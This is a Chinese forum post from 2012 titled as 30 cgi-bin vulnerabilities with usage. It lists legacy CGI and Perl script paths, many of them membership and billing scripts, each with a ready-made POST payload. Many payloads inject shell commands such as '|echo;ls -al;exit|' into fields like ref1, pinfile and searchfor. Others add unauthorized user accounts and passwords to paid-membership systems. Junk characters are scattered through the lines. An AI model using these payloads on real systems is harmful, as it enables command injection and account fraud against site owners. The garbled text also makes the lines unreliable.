找回密码
 立即注册
查看: 3601|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
==============================
; ~8 U. Y1 q3 f5 o( y
: \5 {) z8 S9 I4 Z/ O% n/smspass.pl- T2 G+ g- B, f* X* J7 b: O
username=username&password=password
) `* ?  }$ X2 r2 x2 V
1 `7 o4 m+ C8 ~+ J* h; F0 N/index.cgi
/ U. p0 r( h/ Q  H: d* C  awei=ren&gen=command
& N+ K: M; f8 U6 ~- }4 |, g" W, ?* z7 {* d: t% Z, e$ [
/passmaster.cgi* X& a- U# {/ ]5 j% @/ o( |$ y+ I& L
Action=Add&Username=Username&Password=Password. ?# r- r" j1 H, p* t

( H4 X7 M0 ]' W: b/accountcreate.cgi
5 Y: }5 N- J3 Iusername=username&password=password&ref1=|echo;ls|
$ \. w% T' C7 |: _1 J* `0 I3 c, X% I7 H% K- f* V4 F/ q$ i: I1 P: j' [
/form.cgi: B- q8 e( Z! {( n) D3 Q
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
6 o' V$ }* X5 D' e" h' A3 t
+ Z7 H& T" P. V& s  v' e4 F2 r7 Z/addusr.pl4 M- O( w6 y7 v5 Q7 w. z
/cgi-bin/EuroDebit/addusr.pl
6 K. h$ X; F7 O9 puser=username&pass=Password&confirm=Password
& R8 n( `7 h6 G  S% X+ p  c! F7 ?# E1 U" N
/ccbill-local.asp& z* v+ P/ W: K0 ?
post_values=username:password
' P2 r1 _1 V+ M5 E0 l! u+ I* }/ V: ?3 Z* }
/count.cgi
0 j3 n/ f9 F/ J) ~" xpinfile=|echo;ls -la;exit|6 ?- ]6 _2 C, m' }+ }
! T' D: w  O$ u+ X0 \( `) Y
/recon.cgi
6 X2 Y, g# H/ f4 D# z+ _% P( _6 W/recon.cgi?search
- u( u0 \2 b5 q5 }searchoption=1&searchfor=|echo;ls -al;exit|
- ?* F+ w' ^( L) X8 }' b
2 _( H: F; [& {. ?2 Y, y/verotelrum.pl! O% Z2 L4 q! \! `, a
vercode=username:password:dseegsow:add:amount<&30>* N9 x8 B8 t1 l# M8 N' ^
7 J% `0 X+ N# n' ^4 I
/af.cgi" j6 J& J4 \, Z6 \
_browser_out=|echo;ls -la;exit;|. H2 s' n, x: j3 c: F% f
! [+ B( p/ i0 Y* Y
/modify.cgi
2 j4 T$ x' n& o9 |username=username&password=password&expire=30
6 q9 c0 l% j3 H! Z& y& j8 Y3 a* ~$ E. |
/openjournal.cgi" D1 N5 H6 p9 ?8 z* @
edit=1&ct=2&go=|echo;ls -al;exit|
4 ]* @! q4 i8 j8 B' H1 z( H6 B2 F$ ~$ M+ A
/gx9passwd.cgi4 k! k5 A  l6 @
cmd=ADD&user=username&pass=password, o7 k. F  V3 j- `: Q& d

2 E7 ~& n' v, m/probecontrol.cgi5 I$ G' O: C: p  d4 c
command=enable&username=username&password=password
, y8 z4 X" U0 c$ x! J7 \+ ?3 M' h+ x" t9 m7 x/ s+ L8 k' N
/recon.cgi+ }; D3 s+ L" Z' V8 ~, B
searchoption=3&searchfor=echo;ls -la;exit( J' _/ H) U( \# x  f2 t

& t" q" a8 z* ]/htadd.pl
' u( K; ]3 Y/ }& P5 K7 Hconfigfile=|echo; ls -alt; exit
6 T1 x0 z6 ?' _6 z
$ A8 K% K+ X% m% `" p/gx9passwd.cgi
9 ~$ o" L2 C! W$ b; ucmd=ADD&user=username&pass=password0 i, n7 b1 u& g$ I& P3 P5 l

) ~$ p/ v5 y( ?* i; l/ibill*.pl
+ T$ g8 a' y) A5 O" J" qreqtype=add&authpwd=authpwd&username=username&password=password, @- X6 k+ o4 P( x& |4 l2 u

8 f3 r3 B( s  E3 b" T/cpay.cgi  \( p5 e0 C; C, F% ^9 D. v. U. Y
command=add_member&username=username(EMAIL)&password=password(DES)
+ ~% I( ]; q! W+ D
7 E0 v- `. T; ], W! S/globill_ut.cgi
4 y/ G+ A' U5 q( y- n7 L* d# O$ K$ Gdo=add&username=username&password=password&wpassword=password; X/ {! }5 [: {2 e& q$ {
6 H5 }) i" e/ F/ u
/usercontrol.cgi1 j- h/ d" T2 v) ]
command=enable&username=USER&password=PASS
% B3 ~+ \1 m" K( M% T& W' `( f* N  o) R  Z! {5 }! B+ T
/globoSALErum.cgi0 @- @0 `! {% g- |3 [+ B# e3 ^) D
action=ADD&seccode=seccode&login=username&password=password
9 ?( F& g: m# h; Y4 r: R
  @/ L1 }  |, J6 l/addusr.pl2 j9 [; m1 M$ Z6 f; |5 X2 B# D5 h
user=USER&pass=PASS&confirm=PASS
0 J' ~# f2 x" n  J' [3 O
/ E# L! M  n  W8 V3 H9 T  b/pincount.cgi
7 m2 V% _. a+ j: _) Y# D5 e/cgi-bin/mastergate/pincount.cgi3 N3 Y$ i* w8 q8 g, V3 l
pinfile=|echo;pwd;exit|
9 k- P% q2 Z% E
" q6 @! `0 B2 E" f; Q; K& I/accountcreate.cgi
6 z! u" Y2 ^; t# O+ `' g6 j9 |2 Z9 B/cgi-bin/gateway/accountcreate.cgi
0 h8 q/ h' H8 Y/ Eusername=username&password=password&password2=password&ref1=|echo;ls -al;exit
! _/ \5 V: N+ M/ u+ b$ c7 _& k; i8 u# [1 _
/af.cgi
& q1 V/ l5 {8 }: B: t/env.cgi5 ?' i& c. t2 H% M" N
ADD+;echo;pwd;exit; H3 h! `6 ~4 ]: H6 y2 ?$ K

* E# l# X: e1 f9 U, K/ `) b! ~; L4 ~/count.cgi4 I- }- ~/ M+ |8 f& F/ `% P
pinfile=|echo;pwd;exit|
% f+ v+ a! u" h( V9 [" y5 `; `  {( b: o+ F
/recon.cgi# y4 E; Q( Y1 z$ x* f
searchoption=1&searchfor=|echo;ls%20-al;exit|( I# e0 d; n$ U" {( O( c

; \5 ]5 j+ e# r, R7 i+ H/add.cgi
( q. q/ F9 ?' r! O2 uusername=username&password=password&expire=30# J5 p6 u& q1 s) m, `
4 M% H+ F5 m% R/ k8 o
==============================
& Z; c( x3 l" L! ]) _! L) V
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表